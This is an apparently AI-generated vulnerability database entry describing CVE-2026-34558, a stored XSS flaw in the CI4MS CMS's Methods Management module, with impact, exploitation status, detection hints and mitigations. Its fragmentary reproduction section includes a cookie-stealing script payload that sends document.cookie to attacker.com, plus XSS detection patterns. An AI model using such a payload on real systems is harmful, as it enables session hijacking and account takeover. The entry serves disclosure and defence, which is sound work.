
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-34558 is a Stored DOM-Based Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton with RBAC authorization and theme support. The flaw exists in the Methods Management functionality, where multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding, and later rendered globally across administrative interfaces and navigation components. It affects CI4MS versions up to and including 0.28.6.0, and was disclosed on March 30, 2026, with a patch released in version 0.31.0.0. The vulnerability carries a CVSS v3.1 base score of 9.1 (Critical) per the GitHub Advisory, and 9.0 (Critical) per NVD (GitHub Advisory, GHSA).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), where user-controlled input in the Methods Management module is stored server-side without sanitization or HTML entity encoding and later rendered unsafely into the DOM — likely via unsafe sinks such as .html() or innerHTML — across administrative interfaces and global navigation/menu components (GitHub Advisory). The attack vector is network-based and requires only low privileges (a standard authenticated account), with no user interaction required for payload execution once stored, because the injected method appears in the globally rendered navigation menu that loads on every backend page. Vulnerable fields include Page Name, Description, Controller, Method Name, Seflink, Page Order, Symbol (FontAwesome 5), Permissions, Parent Page, and Module, all accessible via the /backend/methods/ and /backend/methods/create endpoints. A proof-of-concept with step-by-step reproduction instructions and a video PoC are publicly available (GHSA).
Successful exploitation enables persistent, platform-wide JavaScript execution in the browsers of all users who visit any backend page where the malicious method appears in the navigation menu — including administrators. This allows session hijacking, CSRF token theft, privilege escalation, and full account takeover across all roles, effectively resulting in complete application compromise (GitHub Advisory). Because the payload is globally rendered in the navigation structure, a single injection by a low-privileged attacker can affect every administrative user without requiring any additional interaction from victims.
A public proof-of-concept with detailed step-by-step reproduction instructions and a video demonstration is available via the GitHub Security Advisory (GHSA). There is no evidence of in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.046% (per Feedly/NVD data), indicating a low but non-zero probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
/backend/methods/create to access the method creation form.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into any vulnerable field such as Page Name, Description, or Method Name./backend/methods/create or /backend/methods/ containing encoded JavaScript payloads (e.g., <script>, javascript:, onerror=, onload=) in form field parameters.<script>, event handler attributes) in stored method records within the database, particularly in fields such as Page Name, Description, Controller, or Method Name.Upgrade CI4MS to version 0.31.0.0 or later, which contains the official patch for this vulnerability (GitHub Advisory). As interim measures, restrict access to the Methods Management functionality (/backend/methods/) to only highly trusted administrators, and audit all existing method records for malicious payloads injected prior to patching. Additionally, implement a strict Content Security Policy (CSP), set cookies with HttpOnly, Secure, and SameSite flags, and apply server-side input validation with contextual output encoding (HTML entity encoding) for all user-controlled fields in the Methods Management module.
The vulnerability received coverage from The Hacker Wire, which published a dedicated article on the Stored DOM-Based XSS in CI4MS Methods Management (The Hacker Wire). Additional coverage appeared on infinitsec.net and yazoul.net, highlighting the full account takeover potential. Social media discussion was noted on Mastodon, with community members flagging the severity of the global navigation-based payload execution. The vulnerability was also indexed by GitLab Advisories and ENISA's EUVD database (EUVD-2026-17214), reflecting broad awareness across the security community.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."